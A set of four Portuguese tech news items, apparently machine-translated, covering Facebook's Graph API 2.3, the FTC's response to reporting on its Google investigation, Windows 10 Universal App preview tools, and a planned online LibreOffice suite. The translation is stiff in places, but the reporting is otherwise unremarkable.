As atualizações para Graph API do Facebook são mais incremental. Versão 2.3 é o quarto lançamento pontual da geração 2.x da API, que foi introduzido pela primeira vez na conferência F8 do ano passado, em abril. A versão 2.2 foi lançado em Outubro de 2014.


Grandes atualizações na versão 2.3 incluem um novo modo de depuração que dá aos desenvolvedores de dados adicionais para cada chamada API, novos recursos para gerenciar vídeos e páginas, e novas permissões para usuários, tais como a capacidade de compartilhar conteúdo com "Todos os amigos em comum."


Os desenvolvedores podem começar a trabalhar com Graph API 2.3 imediatamente. Facebook não disse quando esperar a próxima versão da API, a não ser que a versão 2.3 permanecerá disponível "pelo menos até 25 de março, 2017" - que passa a ser o mesmo dia em que a edição anterior, a versão 2.2, fica escura.


O Facebook SDK 4.0, por sua vez, foi ao ar em da empresa site de download na quarta-feira. Abundante documentação também está disponível, incluindo guias de atualização para iOS e Android . ®







via Alimentação (Feed)

Google-gate: "desdentado" cão de guarda FTC petiscos furiosamente contra jornalistas


A Federal Trade Commission (FTC) tem respondido aos críticos nos meios de comunicação que afirmam que o regulador caiu uma investigação sobre Google após flambagem sob pressão da Casa Branca e do poderoso gigante da publicidade.


Voltar em 2012, funcionários da fiscalização norte-americano acusou o Google de rivais injustamente enterrando em seus resultados de busca, entre outras peripécias, mas a sonda foi finalmente morto off por comissários da FTC. Google beliscou a forma como ele tratou os concorrentes, e negou que quebrou leis antitruste dos EUA.





Em uma declaração conjunta, hoje, três dos cinco comissários da FTC - Edith Ramirez, Julie Brill e Maureen K. Ohlhausen - disse "não havia base legal para a ação" contra o Google "no que diz respeito ao foco principal da investigação - de pesquisa."


O trio acusam o Wall Street Journal , em especial, de fazer "uma série de inferências enganosas e sugestões sobre a integridade da investigação da FTC" em sua cobertura do Google-gate, e queixou-se o papel criou uma "narrativa enganosa" para o qual "não um único fato é oferecido. "


Notavelmente, a declaração não questiona o fato de que a FTC e da Casa Branca, teve uma série de reuniões com executivos do Google no imediato preparativos para a decisão da FTC para soltar a sua investigação sobre Google. Mas ele faz chamar os confabs "díspares e não relacionados."


A declaração também não negou a existência de uma série de outras preocupações levantadas pela equipe da FTC sobre práticas de negócios do Google, que foram resolvidos pelo Google concordar com algumas mudanças voluntárias para evitar um processo antitruste.


A declaração faz argumentam, no entanto, que "ao longo dos últimos dois anos, o Google tem agido de acordo com esses compromissos", e rejeita a sugestão de que a decisão dos comissários da FTC para fechar o inquérito foi contra recomendações da equipe.


Leia este cuidado


No que foi, sem dúvida, uma frase muito cuidadosamente elaborada, os três comissários afirmar que: "Ao contrário de relatos da imprensa recentes, a decisão da Comissão sobre as alegações de busca estava de acordo com as recomendações do Bureau of Competition, Bureau of Economics, e Gabinete do FTC do Conselho Geral. "


A controvérsia surgiu quando o WSJ foi "acidentalmente" dado um documento FTC confidencial interna em resposta a um pedido mais geral de liberdade de informação, um documento que delineou a profundidade de mau comportamento do Google e do fato de que o pessoal FTC recomendado tomar Google a tarefa para lo. À medida que revelou mais cedo hoje , o Google tem uma relação especialmente próxima à administração Obama.


Os comissários me arrependo a parte de informação de vazamento da saga: "A Comissão toma a sério a sua obrigação de manter a confidencialidade dos negócios e outras informações confidenciais fornecidas à agência por todas as partes envolvidas em nossas investigações Estamos tomando medidas adicionais para garantir que. um tal revelação não ocorrer no futuro. "


Presumivelmente, esses passos irão incluir um processo adicional, onde os próprios comissários verificar se não há documentos que sugerem conluio com empresas sob investigação ou influência política indevida da Casa Branca são sempre autorizados a sair dos arquivos FTC. ®







via Alimentação (Feed)

App Metro atende o Windows 10. A Microsoft ganhar? Talvez depois de uma pequena melhora


Primeiro Olhar Microsoft lançou ferramentas de visualização para a do Windows 10 Universal App Platform (UAP), dando aos desenvolvedores a sua primeira oportunidade de experimentar e construir aplicativos de estilo novo Windows.


As ferramentas que você pode encontrar aqui , exigem a mais recente tecnologia de pré-visualização de Visual Studio 2015, bem como a visualização do próprio Windows 10, por isso é pré-visualização na visualização em antevisão: não algo para uma máquina de produção.





A documentação é atualmente tanto esboçado e confusa, graças à decisão da Microsoft de re-uso do nome "App Universal", já utilizado para um tipo de projeto do Windows 8.1 que atinge várias plataformas, utilizando o código compartilhado. Você pode ter que varrem esses vídeos para obter uma visão detalhada da nova plataforma.


Vale a pena notar que você não tem que usar um App Universal para direcionar o Windows 10. Ele ainda é o Windows, e os projetos Win32 ambos continuam a trabalhar, com a vantagem de que eles também executado no Windows 7 e 8.


Qual é a diferença entre a nova e velha App Universal? Além de melhorias incrementais, a mudança fundamental é que um projeto UAP é um projecto único que funciona em todas as plataformas suportadas, o que incluirá o Windows 10 PCs, tablets, telefones, Xbox One e Windows 10 IoT (Internet of Things).


Anteriormente, a App Universal incluiu vários projetos, um para o código compartilhado, e outro para cada plataforma suportada, e você iria construir aplicativos separados por plataforma.


The Windows Core platform

A plataforma Windows Núcleo



Para atingir este nível de compatibilidade, a Microsoft fatoramos um "Windows núcleo" que é comum a todas as plataformas. Há ainda uma abundância de características específicas do dispositivo, porém, que você pode direcionar referenciando "extensão SDKs", como para Windows Desktop ou Windows Mobile (sim, ele é chamado de Windows Mobile Extension SDK nas ferramentas de visualização, o que sugere que este nome antigo pode retornar).


Se você usar um SDK Extension, a API referenciado só irá funcionar nessa plataforma, mas a API stub existe nas outras plataformas que não faz nada. É para baixo para o desenvolvedor de escrever código para detectar se ele está presente, através de funções como IsTypePresent ou IsEventPresent.


Compilação condicional com #if ainda funciona, mas é desencorajado, uma vez que quebra o conceito UAP, levando-o de volta para a antiga abordagem de separado constrói para cada dispositivo.


Outra peça do quebra-cabeça é o que a Microsoft chama de Adaptive UX, onde você cria uma interface de usuário única que se adapta ao dispositivo. É uma abordagem semelhante ao que na web é chamado de UI Responsive, uma página web que se adapta ao tamanho da tela e funciona em tudo, desde dispositivos móveis para desktops.


Será que um UX Adaptive não vem de graça, embora; o desenvolvedor tem que considerar diferentes tamanhos de tela ou janela e escrever "Adaptive Triggers", que alteram as propriedades de controle de acordo com o tamanho do display.


Criando um Adaptive UX é mais fácil do que era, graças a um novo controle de layout chamado RelativePanel, que permite que você posição criança regula quer em relação ao painel, ou em relação ao outro. Você pode dizer, por exemplo, que você quer um título centrado na parte superior, e uma caixa de entrada abaixo do cabeçalho alinhado à sua margem esquerda.


Como Metro no Windows 8 (também conhecido como loja de aplicativos), a App Universal roda em cima do tempo de execução do Windows (WinRT), um ambiente de área restrita, que também é passível de controle de toque. Existem algumas melhorias úteis para a plataforma WinRT nesta versão, incluindo:



  • Arrastar e soltar apoio entre aplicativos e área de trabalho do Windows, importantes para a integração com o desktop

  • Serviços App, uma API baseada em mensagens que permite chamada um app em uma tarefa em segundo plano executado por um outro app e obter um resultado

  • O armazenamento compartilhado: um app pode passar um token para outro app para habilitá-lo para abrir um arquivo compartilhado

  • O suporte para o open source AllJoyn estrutura para aplicações da Internet das coisas

  • 3D transforma para aplicações e efeitos gráficos

  • Controle WebView baseado no novo motor "Projeto Spartan" para um melhor suporte a padrões

  • Novo controle e serviços de mapa, assim você sobrepõe facilmente seus próprios elementos da interface do usuário em um mapa

  • Novo controle de calendário que também é utilizado pela versão Universal App do Outlook

  • Esta não é uma lista exaustiva e há mais por vir







via Alimentação (Feed)

Document Foundation promete Office 365 e Google Docs challenger


A edição recebeu do LibreOffice é planejado como uma alternativa gratuita e aberta ao Office 365 e Google Docs no final do ano.


A suíte proporcionaria edição on-line e compartilhamento de documentos escritos usando a suite de fonte aberta livre.





The Document Foundation, disse nesta quarta-feira que LibreOffice contribuinte Collabora está trabalhando com a especialista colaboração IceWarp para entregar edição baseada em web na suíte.


Uma versão HTML5 do LibreOffice foi primeiramente discutido em 2011 e viu o desenvolvimento de um novo motor de renderização para trabalhar corretamente no navegador.


Os documentos serão guardados e gerenciados de servidor IceWarp, a base da plataforma de colaboração on-line que da empresa. IceWarp fornece groupware, calendário e gestão de documentos, mensagens instantâneas, vídeo e sincronização móvel via cliente web HTML5.


Onde o objetivo de tais suites era uma vez para assumir onipresente do Office da Microsoft na área de trabalho agora suas metas são Office 365 e suite gratuito do Google.


Presidente Document Foundation Thorsten Behrens afirmou em um comunicado que os usuários do LibreOffice seria capaz de alternar facilmente entre versões desktop, móvel e em nuvem da suíte de código aberto "sem sair de seu software livre de escolha."


A Fundação prometeu entregar algo que qualquer provedor poderia implementar, sem restrições em termos de formatos de documentos ou o lock-in do fornecido pelo fornecedor de nuvem.


"As empresas [Collabora e IceWarp] visam restabelecer a concorrência leal a um mercado dominado por fornecedores monopolistas, bem como para impulsionar a inovação, compatibilidade e interoperabilidade através de formatos abertos, em todas as plataformas para todo mundo", disse a Fundação. ®







via Alimentação (Feed)